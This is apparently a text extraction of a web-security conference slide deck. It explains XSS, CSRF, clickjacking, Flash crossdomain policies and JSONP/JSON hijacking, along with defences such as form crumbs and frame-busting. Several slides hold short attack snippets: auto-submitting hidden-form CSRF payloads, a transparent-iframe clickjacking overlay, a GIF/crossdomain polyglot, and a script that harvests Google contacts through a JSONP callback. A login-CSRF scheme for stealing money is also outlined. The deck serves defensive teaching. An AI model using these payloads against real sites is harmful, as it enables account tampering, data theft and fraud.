  • 26. The UTF-7 hole • Google’s 404 pages used to be served without a character set specified in the HTTP headers or <head> section • Without those hints, IE inspects the first 4096 bytes to “guess” which encoding is used • XSS attacks encoded as UTF-7 were shown on the page and executed by IE http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
  • 27. You can’t trust CSS either • Want to let your users include their own stylesheet? • HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks • LiveJournal were attacked with this • A “position: absolute” hack was used to steal 30,000 MySpace passwords last year http://community.livejournal.com/lj_dev/708069.html http://www.securiteam.com/securitynews/6O00M0AHFW.html
  • 28. CSRF
  • 29. Bill Zeller: “We’ve found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If you’re in charge of a website and haven’t specifically protected against CSRF, chances are you’re vulnerable”
  • 30. The Google Web Accelerator
  • 31. How does it work? • It pre-fetches the links on a page in to a cache, so they’re already loaded when you click on them • Links like http://app.example.com/ delete.php?id=5
  • 32. How does it work? • It pre-fetches the links on a page in to a cache, so they’re already loaded when you click on them • Links like http://app.example.com/ delete.php?id=5
  • 34. That’s also a security hole <img src=quot;http://app.example.com/delete.php?id=1quot;> <img src=quot;http://app.example.com/delete.php?id=2quot;> <img src=quot;http://app.example.com/delete.php?id=3quot;> <img src=quot;http://app.example.com/delete.php?id=4quot;> <img src=quot;http://app.example.com/delete.php?id=5quot;> <img src=quot;http://app.example.com/delete.php?id=6quot;> <img src=quot;http://app.example.com/delete.php?id=7quot;> <img src=quot;http://app.example.com/delete.php?id=8quot;> ...
  • 35. So use POST • You can't create a page that automatically posts to another site, can you?
  • 36. POST will not save you <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> <input type=quot;submitquot; value=quot;More kittens please!quot;> </form> fofurasfelinas: http://www.flickr.com/photos/fofurasfelinas/9724483/
  • 37. Or do it with JavaScript <div style=quot;display: nonequot;> <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> </form> </div> <script>document.forms[0].submit()</script> Put this in a hidden iframe and your victim won't even know it happened.
  • 38. The Digg exploit • A few years ago, Digg had no CSRF protection on their “digg this” button • Self-digging pages! http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
  • 39. The Gmail filter hack http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
  • 40. “We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution.” http://www.freedom-to-tinker.com/blog/wzeller/ popular-websites-vulnerable-cross-site-request- forgery-attacks
  • 41. Preventing CSRF • You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site • Referrer checking is notoriously unreliable • Solution: include a form token (Yahoo! calls this a “crumb”) proving that the post came from your site
  • 42. Crumbs <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;37quot;> <input type=quot;hiddenquot; name=quot;crumbquot; value=quot;856c2f50ddc49fd710f14a406ec1fef652d3c9fquot;> <input type=quot;submitquot; value=quot;Delete this itemquot;> </form>
  • 43. Crumbs • Should be unique per user (or one user can use their crumb to attack another) • Hence should be tied to the user’s session or login cookie • Should be changed over time • Quick and dirty: use sha1(salt + user’s session ID + timestamp) as the crumb
  • 44. Protecting the crumb • Your crumb is now the only thing protecting you from CSRF attacks • This is why XSS is “ring 0” for the Web • With XSS, I can steal your crumb and run riot across your site • XSS holes are automatically CSRF holes
  • 45. Crumbs and Ajax • Ajax can set HTTP headers; regular forms can’t • Ajax requests must be from the same domain • So X-Requested-By: XMLHttpRequest can only come from your own site • You can skip your crumb checking for requests that include that custom header
  • 46. Login CSRF • Most login forms skip CSRF protection • Create a throw-away PayPal account • Use CSRF to log someone in as “you” • Hope that they add their credit card or bank details • Log in later and steal all of their money!
  • 49. iframe !
  • 55. <style type=quot;text/cssquot;> iframe { width: 400px; height: 200px; position: absolute; top: 10px; left: 10px; overflow: hidden; opacity: 0; } #decoy { ... } </style> <iframe src=quot;http://veryimportantapp.com/delete-account/quot;> </iframe> <p id=quot;decoyquot;>Click HERE for kittens!</p>
  • 56. Frame-busting <script type=quot;text/javascriptquot;> if (top.location != location) { top.location.href = document.location.href; } </script> • Ironically, turning off JavaScript in your browser makes you less safe here
  • 60. The problem with plugins
  • 61. crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header That’s why Flickr use api.flickr.com/crossdomain.xml instead
  • 62. crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header That’s why Flickr use api.flickr.com/crossdomain.xml instead
  • 63. Nasty crossdomain.xml tricks loadPolicyFile(quot;http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xmlquot;) 00000000 47 49 46 38 39 61 01 01-01 01 e7 e9 20 3c 63 72 GIF89a.......<cr 00000010 6f 73 73 2d 64 6f 6d 61-69 6e 2d 70 6f 6c 69 63 oss-domain-polic 00000020 79 3e 0a 20 20 3c 61 6c-6c 6f 77 2d 61 63 63 65 y>...<allow-acce 00000030 73 73 2d 66 72 6f 6d 20-64 6f 6d 61 69 6e 3d 22 ss-from domain=quot; 00000040 2a 22 2f 3e 20 0a 20 20-3c 2f 63 72 6f 73 73 2d *quot;/>....</cross- 00000050 64 6f 6d 61 69 6e 2d 70-6f 6c 69 63 79 3e 47 49 domain-policy>.. http://www.hardened-php.net/library/ poking_new_holes_with_flash_crossdomain_policy_files.html
  • 64. The PDF hole • In January 2007, an XSS hole was found in the Adobe PDF reader itself • It could execute JavaScript in the context of the current domain • Any sites hosting .pdf files for download were vulnerable http://shiflett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
  • 65. You can’t secure your site 100%, because there’s always a chance a browser or plugin will screw things up for you
  • 67. JSONP rocks! • http://json-tinyurl.appspot.com/ • http://json-time.appspot.com/ • http://json-head.appspot.com/ http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo foo({quot;tinyurlquot;: quot;http://tinyurl.com/kotuquot;, quot;okquot;: true})
  • 68. • JSONP lets you opt-in to sharing your site’s data with other sites using JavaScript • ... so make sure it’s data you want to share
  • 69. Stealing Google contacts <script> function google(a){ var emails; for(i=1;i<a.Body.Contacts.length;i){ alert(a.Body.Contacts[i].Email); } emails = quot;</ol>quot; document.write(emails); } </script> <script src=quot;http://docs.google.com/data/contacts? out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;> </script> http://blog.adamjacobmuller.com/gmail.txt http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
  • 70. Jeremiah Grossman: “If any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at risk” http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
  • 71. Regular JSON? • That’s not secure either • In old versions of Firefox, you can redefine the Array constructor to grab the data • If your JSON object is an array, the data can be grabbed using <script src=quot;your- data-herequot;> http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
  • 72. Secure JSON Use { } as the root, not [ ] If you’re paranoid about future similar problems, use an idiom like this one: while (true) { {quot;jsonquot;: quot;goes herequot;} }
  • 73. And if that wasn’t enough “More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.” http://news.bbc.co.uk/1/hi/technology/3639679.stm • We have a shared responsibility to teach people better online security behaviour • Don’t teach our users to be phished!
  • 75. Stay informed! • http://planet-websecurity.org/feed/ • http://www.owasp.org/ • http://simonwillison.net/tags/security/ • http://simonwillison.net/tags/csrf/ • http://simonwillison.net/tags/xss/ • http://simonwillison.net/tags/clickjacking/ • http://simonwillison.net/tags/phishing/